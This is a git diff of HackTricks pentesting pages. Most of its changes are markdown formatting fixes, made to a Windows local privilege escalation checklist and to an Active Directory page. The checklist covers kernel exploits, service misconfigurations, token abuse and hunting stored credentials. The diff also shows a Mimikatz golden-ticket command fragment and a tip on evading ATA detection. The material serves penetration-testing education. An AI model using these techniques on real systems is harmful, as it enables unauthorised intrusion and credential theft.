@ -379,7 +376,7 @@ Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<current
**For user objects:** **For user objects:**
* ObjectSID (different from the domain) * ObjectSID (different from the domain)
* lastLogon, lastlogontimestamp&#x20; * lastLogon, lastlogontimestamp
* Logoncount (very low number is suspicious) * Logoncount (very low number is suspicious)
* whenCreated * whenCreated
* Badpwdcount (very low number is suspicious) * Badpwdcount (very low number is suspicious)
@ -410,6 +407,6 @@ If you don't execute this from a Domain Controller, ATA is going to catch you, s
* [Python script to enumerate active directory](https://github.com/ropnop/windapsearch) * [Python script to enumerate active directory](https://github.com/ropnop/windapsearch)
* [Python script to enumerate active directory](https://github.com/CroweCybersecurity/ad-ldap-enum) * [Python script to enumerate active directory](https://github.com/CroweCybersecurity/ad-ldap-enum)
![](<../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (10).png>) ![](<../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (2).png>)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop) [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)

View file

@ -8,53 +8,53 @@ Do you use **Hacktricks every day**? Did you find the book **very** **useful**?
If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
### **Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)**** ### **Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)\*\*\*\*
### [System Info](windows-local-privilege-escalation/#system-info) ### [System Info](windows-local-privilege-escalation/#system-info)
* [ ] Obtain [**System information**](windows-local-privilege-escalation/#system-info)**** * [ ] Obtain [**System information**](windows-local-privilege-escalation/#system-info)\*\*\*\*
* [ ] Search for **kernel** [**exploits using scripts**](windows-local-privilege-escalation/#version-exploits)**** * [ ] Search for **kernel** [**exploits using scripts**](windows-local-privilege-escalation/#version-exploits)\*\*\*\*
* [ ] Use **Google to search** for kernel **exploits** * [ ] Use **Google to search** for kernel **exploits**
* [ ] Use **searchsploit to search** for kernel **exploits** * [ ] Use **searchsploit to search** for kernel **exploits**
* [ ] Interesting info in [**env vars**](windows-local-privilege-escalation/#environment)? * [ ] Interesting info in [**env vars**](windows-local-privilege-escalation/#environment)?
* [ ] Passwords in [**PowerShell history**](windows-local-privilege-escalation/#powershell-history)? * [ ] Passwords in [**PowerShell history**](windows-local-privilege-escalation/#powershell-history)?
* [ ] Interesting info in [**Internet settings**](windows-local-privilege-escalation/#internet-settings)? * [ ] Interesting info in [**Internet settings**](windows-local-privilege-escalation/#internet-settings)?
* [ ] [**Drives**](windows-local-privilege-escalation/#drives)? * [ ] [**Drives**](windows-local-privilege-escalation/#drives)?
* [ ] ****[**WSUS exploit**](windows-local-privilege-escalation/#wsus)? * [ ] \*\*\*\*[**WSUS exploit**](windows-local-privilege-escalation/#wsus)?
* [ ] ****[**AlwaysInstallElevated**](windows-local-privilege-escalation/#alwaysinstallelevated)? * [ ] \*\*\*\*[**AlwaysInstallElevated**](windows-local-privilege-escalation/#alwaysinstallelevated)?
### [Logging/AV enumeration](windows-local-privilege-escalation/#enumeration) ### [Logging/AV enumeration](windows-local-privilege-escalation/#enumeration)
* [ ] Check [**Audit** ](windows-local-privilege-escalation/#audit-settings)and [**WEF** ](windows-local-privilege-escalation/#wef)settings * [ ] Check [**Audit** ](windows-local-privilege-escalation/#audit-settings)and [**WEF** ](windows-local-privilege-escalation/#wef)settings
* [ ] Check [**LAPS**](windows-local-privilege-escalation/#laps)**** * [ ] Check [**LAPS**](windows-local-privilege-escalation/#laps)\*\*\*\*
* [ ] Check if [**WDigest** ](windows-local-privilege-escalation/#wdigest)is active * [ ] Check if [**WDigest** ](windows-local-privilege-escalation/#wdigest)is active
* [ ] [**LSA Protection**](windows-local-privilege-escalation/#lsa-protection)? * [ ] [**LSA Protection**](windows-local-privilege-escalation/#lsa-protection)?
* [ ] ****[**Credentials Guard**](windows-local-privilege-escalation/#credentials-guard)[?](windows-local-privilege-escalation/#cached-credentials) * [ ] \*\*\*\*[**Credentials Guard**](windows-local-privilege-escalation/#credentials-guard)[?](windows-local-privilege-escalation/#cached-credentials)
* [ ] [**Cached Credentials**](windows-local-privilege-escalation/#cached-credentials)? * [ ] [**Cached Credentials**](windows-local-privilege-escalation/#cached-credentials)?
* [ ] Check if any [**AV**](windows-local-privilege-escalation/#av)**** * [ ] Check if any [**AV**](windows-local-privilege-escalation/#av)\*\*\*\*
* [ ] ****[**AppLocker Policy**](windows-local-privilege-escalation/#applocker-policy)? * [ ] \*\*\*\*[**AppLocker Policy**](windows-local-privilege-escalation/#applocker-policy)?
* [ ] [**UAC**](windows-local-privilege-escalation/#uac)? * [ ] [**UAC**](windows-local-privilege-escalation/#uac)?
### ****[**User Privileges**](windows-local-privilege-escalation/#users-and-groups) ### \*\*\*\*[**User Privileges**](windows-local-privilege-escalation/#users-and-groups)
* [ ] Check [**current** user **privileges**](windows-local-privilege-escalation/#users-and-groups)**** * [ ] Check [**current** user **privileges**](windows-local-privilege-escalation/#users-and-groups)\*\*\*\*
* [ ] Are you [**member of any privileged group**](windows-local-privilege-escalation/#privileged-groups)? * [ ] Are you [**member of any privileged group**](windows-local-privilege-escalation/#privileged-groups)?
* [ ] Check if you have [any of these tokens enabled](windows-local-privilege-escalation/#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?&#x20; * [ ] Check if you have [any of these tokens enabled](windows-local-privilege-escalation/#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
* [ ] [**Users Sessions**](windows-local-privilege-escalation/#logged-users-sessions)? * [ ] [**Users Sessions**](windows-local-privilege-escalation/#logged-users-sessions)?
* [ ] Check[ **users homes**](windows-local-privilege-escalation/#home-folders) (access?) * [ ] Check[ **users homes**](windows-local-privilege-escalation/#home-folders) (access?)
* [ ] Check [**Password Policy**](windows-local-privilege-escalation/#password-policy)**** * [ ] Check [**Password Policy**](windows-local-privilege-escalation/#password-policy)\*\*\*\*
* [ ] What is[ **inside the Clipboard**](windows-local-privilege-escalation/#get-the-content-of-the-clipboard)? * [ ] What is[ **inside the Clipboard**](windows-local-privilege-escalation/#get-the-content-of-the-clipboard)?
### [Network](windows-local-privilege-escalation/#network) ### [Network](windows-local-privilege-escalation/#network)
* [ ] Check **current** [**network** **information**](windows-local-privilege-escalation/#network)**** * [ ] Check **current** [**network** **information**](windows-local-privilege-escalation/#network)\*\*\*\*
* [ ] Check **hidden local services** restricted to the outside * [ ] Check **hidden local services** restricted to the outside
### [Running Processes](windows-local-privilege-escalation/#running-processes) ### [Running Processes](windows-local-privilege-escalation/#running-processes)
* [ ] Processes binaries [**file and folders permissions**](windows-local-privilege-escalation/#file-and-folder-permissions)**** * [ ] Processes binaries [**file and folders permissions**](windows-local-privilege-escalation/#file-and-folder-permissions)\*\*\*\*
* [ ] ****[**Memory Password mining**](windows-local-privilege-escalation/#memory-password-mining)**** * [ ] [**Memory Password mining**](windows-local-privilege-escalation/#memory-password-mining)
* [ ] ****[**Insecure GUI apps**](windows-local-privilege-escalation/#insecure-gui-apps)**** * [ ] [**Insecure GUI apps**](windows-local-privilege-escalation/#insecure-gui-apps)
### [Services](windows-local-privilege-escalation/#services) ### [Services](windows-local-privilege-escalation/#services)
@ -63,11 +63,11 @@ If you want to **share some tricks with the community** you can also submit **pu
* [ ] [Can you **modify** the **registry** of any **service**?](windows-local-privilege-escalation/#services-registry-permissions) * [ ] [Can you **modify** the **registry** of any **service**?](windows-local-privilege-escalation/#services-registry-permissions)
* [ ] [Can you take advantage of any **unquoted service** binary **path**?](windows-local-privilege-escalation/#unquoted-service-paths) * [ ] [Can you take advantage of any **unquoted service** binary **path**?](windows-local-privilege-escalation/#unquoted-service-paths)
### ****[**Applications**](windows-local-privilege-escalation/#applications)**** ### [**Applications**](windows-local-privilege-escalation/#applications)
* [ ] **Write** [**permissions on installed applications**](windows-local-privilege-escalation/#write-permissions)**** * [ ] **Write** [**permissions on installed applications**](windows-local-privilege-escalation/#write-permissions)\*\*\*\*
* [ ] ****[**Startup Applications**](windows-local-privilege-escalation/#run-at-startup)**** * [ ] [**Startup Applications**](windows-local-privilege-escalation/#run-at-startup)
* [ ] **Vulnerable** [**Drivers**](windows-local-privilege-escalation/#drivers)**** * [ ] **Vulnerable** [**Drivers**](windows-local-privilege-escalation/#drivers)\*\*\*\*
### [DLL Hijacking](windows-local-privilege-escalation/#path-dll-hijacking) ### [DLL Hijacking](windows-local-privilege-escalation/#path-dll-hijacking)
@ -82,7 +82,7 @@ If you want to **share some tricks with the community** you can also submit **pu
### [Windows Credentials](windows-local-privilege-escalation/#windows-credentials) ### [Windows Credentials](windows-local-privilege-escalation/#windows-credentials)
* [ ] ****[**Winlogon** ](windows-local-privilege-escalation/#winlogon-credentials)credentials * [ ] \*\*\*\*[**Winlogon** ](windows-local-privilege-escalation/#winlogon-credentials)credentials
* [ ] [**Windows Vault**](windows-local-privilege-escalation/#windows-vault) credentials that you could use? * [ ] [**Windows Vault**](windows-local-privilege-escalation/#windows-vault) credentials that you could use?
* [ ] Interesting [**DPAPI credentials**](windows-local-privilege-escalation/#dpapi)? * [ ] Interesting [**DPAPI credentials**](windows-local-privilege-escalation/#dpapi)?
* [ ] Passwords of saved [**Wifi networks**](windows-local-privilege-escalation/#wifi)? * [ ] Passwords of saved [**Wifi networks**](windows-local-privilege-escalation/#wifi)?
@ -94,21 +94,21 @@ If you want to **share some tricks with the community** you can also submit **pu
### [Files and Registry (Credentials)](windows-local-privilege-escalation/#files-and-registry-credentials) ### [Files and Registry (Credentials)](windows-local-privilege-escalation/#files-and-registry-credentials)
* [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/#putty-creds) **and** [**SSH host keys**](windows-local-privilege-escalation/#putty-ssh-host-keys)**** * [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/#putty-creds) **and** [**SSH host keys**](windows-local-privilege-escalation/#putty-ssh-host-keys)\*\*\*\*
* [ ] ****[**SSH keys in registry**](windows-local-privilege-escalation/#ssh-keys-in-registry)? * [ ] \*\*\*\*[**SSH keys in registry**](windows-local-privilege-escalation/#ssh-keys-in-registry)?
* [ ] Passwords in [**unattended files**](windows-local-privilege-escalation/#unattended-files)? * [ ] Passwords in [**unattended files**](windows-local-privilege-escalation/#unattended-files)?
* [ ] Any [**SAM & SYSTEM**](windows-local-privilege-escalation/#sam-and-system-backups) backup? * [ ] Any [**SAM & SYSTEM**](windows-local-privilege-escalation/#sam-and-system-backups) backup?
* [ ] [**Cloud credentials**](windows-local-privilege-escalation/#cloud-credentials)? * [ ] [**Cloud credentials**](windows-local-privilege-escalation/#cloud-credentials)?
* [ ] ****[**McAfee SiteList.xml**](windows-local-privilege-escalation/#mcafee-sitelist-xml) file? * [ ] \*\*\*\*[**McAfee SiteList.xml**](windows-local-privilege-escalation/#mcafee-sitelist-xml) file?
* [ ] ****[**Cached GPP Password**](windows-local-privilege-escalation/#cached-gpp-pasword)? * [ ] \*\*\*\*[**Cached GPP Password**](windows-local-privilege-escalation/#cached-gpp-pasword)?
* [ ] Password in [**IIS Web config file**](windows-local-privilege-escalation/#iis-web-config)? * [ ] Password in [**IIS Web config file**](windows-local-privilege-escalation/#iis-web-config)?
* [ ] Interesting info in [**web** **logs**](windows-local-privilege-escalation/#logs)? * [ ] Interesting info in [**web** **logs**](windows-local-privilege-escalation/#logs)?
* [ ] Do you want to [**ask for credentials**](windows-local-privilege-escalation/#ask-for-credentials) to the user? * [ ] Do you want to [**ask for credentials**](windows-local-privilege-escalation/#ask-for-credentials) to the user?
* [ ] Interesting [**files inside the Recycle Bin**](windows-local-privilege-escalation/#credentials-in-the-recyclebin)? * [ ] Interesting [**files inside the Recycle Bin**](windows-local-privilege-escalation/#credentials-in-the-recyclebin)?
* [ ] Other [**registry containing credentials**](windows-local-privilege-escalation/#inside-the-registry)? * [ ] Other [**registry containing credentials**](windows-local-privilege-escalation/#inside-the-registry)?
* [ ] Inside [**Browser data**](windows-local-privilege-escalation/#browsers-history) (dbs, history, bookmarks....)? * [ ] Inside [**Browser data**](windows-local-privilege-escalation/#browsers-history) (dbs, history, bookmarks....)?
* [ ] ****[**Generic password search**](windows-local-privilege-escalation/#generic-password-search-in-files-and-registry) in files and registry * [ ] \*\*\*\*[**Generic password search**](windows-local-privilege-escalation/#generic-password-search-in-files-and-registry) in files and registry
* [ ] ****[**Tools**](windows-local-privilege-escalation/#tools-that-search-for-passwords) to automatically search for passwords * [ ] \*\*\*\*[**Tools**](windows-local-privilege-escalation/#tools-that-search-for-passwords) to automatically search for passwords
### [Leaked Handlers](windows-local-privilege-escalation/#leaked-handlers) ### [Leaked Handlers](windows-local-privilege-escalation/#leaked-handlers)
@ -120,12 +120,10 @@ If you want to **share some tricks with the community** you can also submit **pu
### And more... ### And more...
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, join the [💬](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, join the [💬](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
****If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\ \*\*\*\*If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book. Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (4).png>) ![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (4).png>)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)**** [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*